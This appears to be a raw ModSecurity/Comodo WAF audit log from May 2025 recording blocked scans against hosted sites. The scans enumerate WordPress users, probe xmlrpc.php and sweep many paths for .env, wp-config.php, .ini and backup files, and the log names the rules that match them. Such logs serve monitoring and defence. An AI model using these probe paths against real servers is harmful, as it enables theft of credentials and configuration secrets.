"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730669487484 5826 (- - -) Stopwatch2: 1746730669487484 5826; combined=4281, p1=567, p2=3475, p3=34, p4=38, p5=98, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a844c66-Z-- --bfa3dd07-A-- [09/May/2025:01:59:00 +0700] aBz-9I4K347NtBcwXKx01AAAAIU 103.236.140.4 53880 103.236.140.4 8181 --bfa3dd07-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bfa3dd07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfa3dd07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730740489774 3138 (- - -) Stopwatch2: 1746730740489774 3138; combined=1345, p1=448, p2=867, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfa3dd07-Z-- --f5946c55-A-- [09/May/2025:01:59:03 +0700] aBz-944K347NtBcwXKx01QAAAIw 103.236.140.4 53884 103.236.140.4 8181 --f5946c55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f5946c55-C-- demo.sayHello --f5946c55-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5946c55-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730743733439 6603 (- - -) Stopwatch2: 1746730743733439 6603; combined=4781, p1=620, p2=3916, p3=38, p4=42, p5=99, sr=78, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5946c55-Z-- --18c7f02b-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx13wAAAIY 103.236.140.4 55066 103.236.140.4 8181 --18c7f02b-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --18c7f02b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18c7f02b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547173989 764 (- - -) Stopwatch2: 1746731547173989 764; combined=335, p1=297, p2=0, p3=0, p4=0, p5=37, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18c7f02b-Z-- --95a0da45-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx14AAAAII 103.236.140.4 55068 103.236.140.4 8181 --95a0da45-B-- GET /config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --95a0da45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95a0da45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547349760 701 (- - -) Stopwatch2: 1746731547349760 701; combined=263, p1=230, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95a0da45-Z-- --abf0295f-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx14gAAAIU 103.236.140.4 55072 103.236.140.4 8181 --abf0295f-B-- GET /.env.production HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --abf0295f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abf0295f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547595058 659 (- - -) Stopwatch2: 1746731547595058 659; combined=280, p1=248, p2=0, p3=0, p4=0, p5=32, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abf0295f-Z-- --2b8ee044-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx14wAAAIw 103.236.140.4 55074 103.236.140.4 8181 --2b8ee044-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2b8ee044-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b8ee044-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547771439 660 (- - -) Stopwatch2: 1746731547771439 660; combined=280, p1=247, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b8ee044-Z-- --0bb7d048-A-- [09/May/2025:02:12:27 +0700] aB0CG44K347NtBcwXKx15AAAAIc 103.236.140.4 55076 103.236.140.4 8181 --0bb7d048-B-- GET /settings/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0bb7d048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb7d048-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731547937852 676 (- - -) Stopwatch2: 1746731547937852 676; combined=276, p1=223, p2=0, p3=0, p4=0, p5=53, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bb7d048-Z-- --5c35b920-A-- [09/May/2025:02:12:29 +0700] aB0CHKcs1DvJ_HgMHE954gAAAAw 103.236.140.4 55096 103.236.140.4 8181 --5c35b920-B-- GET /db.ini HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5c35b920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c35b920-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731548999503 1680 (- - -) Stopwatch2: 1746731548999503 1680; combined=647, p1=329, p2=292, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c35b920-Z-- --0f809878-A-- [09/May/2025:02:12:33 +0700] aB0CIacs1DvJ_HgMHE954wAAABA 103.236.140.4 55148 103.236.140.4 8181 --0f809878-B-- GET /docker/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0f809878-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f809878-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731553156572 687 (- - -) Stopwatch2: 1746731553156572 687; combined=276, p1=242, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f809878-Z-- --11ab013a-A-- [09/May/2025:02:12:33 +0700] aB0CIY4K347NtBcwXKx1_gAAAJU 103.236.140.4 55150 103.236.140.4 8181 --11ab013a-B-- GET /wp-config.php HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --11ab013a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11ab013a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731553340748 656 (- - -) Stopwatch2: 1746731553340748 656; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11ab013a-Z-- --f75aae68-A-- [09/May/2025:02:12:34 +0700] aB0CIo4K347NtBcwXKx2AQAAAIg 103.236.140.4 55158 103.236.140.4 8181 --f75aae68-B-- GET /env.backup HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f75aae68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f75aae68-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731554037762 1533 (- - -) Stopwatch2: 1746731554037762 1533; combined=636, p1=310, p2=298, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f75aae68-Z-- --7ca6814a-A-- [09/May/2025:02:12:34 +0700] aB0CIo4K347NtBcwXKx2AwAAAIY 103.236.140.4 55164 103.236.140.4 8181 --7ca6814a-B-- GET /settings.bak HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --7ca6814a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ca6814a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731554249469 1675 (- - -) Stopwatch2: 1746731554249469 1675; combined=623, p1=299, p2=293, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ca6814a-Z-- --cfc6cc1f-A-- [09/May/2025:02:12:34 +0700] aB0CIo4K347NtBcwXKx2BQAAAIM 103.236.140.4 55168 103.236.140.4 8181 --cfc6cc1f-B-- GET /old/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cfc6cc1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfc6cc1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731554580649 654 (- - -) Stopwatch2: 1746731554580649 654; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfc6cc1f-Z-- --150d876a-A-- [09/May/2025:02:12:35 +0700] aB0CI44K347NtBcwXKx2CgAAAIo 103.236.140.4 55180 103.236.140.4 8181 --150d876a-B-- GET /laravel/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --150d876a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --150d876a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731555304892 642 (- - -) Stopwatch2: 1746731555304892 642; combined=260, p1=214, p2=0, p3=0, p4=0, p5=46, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --150d876a-Z-- --2f257d67-A-- [09/May/2025:02:12:35 +0700] aB0CI44K347NtBcwXKx2CwAAAI0 103.236.140.4 55182 103.236.140.4 8181 --2f257d67-B-- GET /app/config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2f257d67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f257d67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731555468770 619 (- - -) Stopwatch2: 1746731555468770 619; combined=246, p1=214, p2=0, p3=0, p4=0, p5=31, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f257d67-Z-- --54359b41-A-- [09/May/2025:02:12:36 +0700] aB0CJI4K347NtBcwXKx2DgAAAI4 103.236.140.4 55192 103.236.140.4 8181 --54359b41-B-- GET /.gitignore HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --54359b41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54359b41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.gitignore" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731556520052 747 (- - -) Stopwatch2: 1746731556520052 747; combined=328, p1=291, p2=0, p3=0, p4=0, p5=37, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54359b41-Z-- --9cb4716b-A-- [09/May/2025:02:12:39 +0700] aB0CJ44K347NtBcwXKx2FgAAAIQ 103.236.140.4 55220 103.236.140.4 8181 --9cb4716b-B-- GET /sites/default/settings.php HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9cb4716b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cb4716b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sites/default/settings.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731559307675 706 (- - -) Stopwatch2: 1746731559307675 706; combined=306, p1=272, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb4716b-Z-- --2e84c93d-A-- [09/May/2025:02:12:44 +0700] aB0CLMP9GxxPAbCroFZCSgAAAFM 103.236.140.4 55264 103.236.140.4 8181 --2e84c93d-B-- GET /php.ini HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2e84c93d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e84c93d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731564984041 2181 (- - -) Stopwatch2: 1746731564984041 2181; combined=812, p1=394, p2=389, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
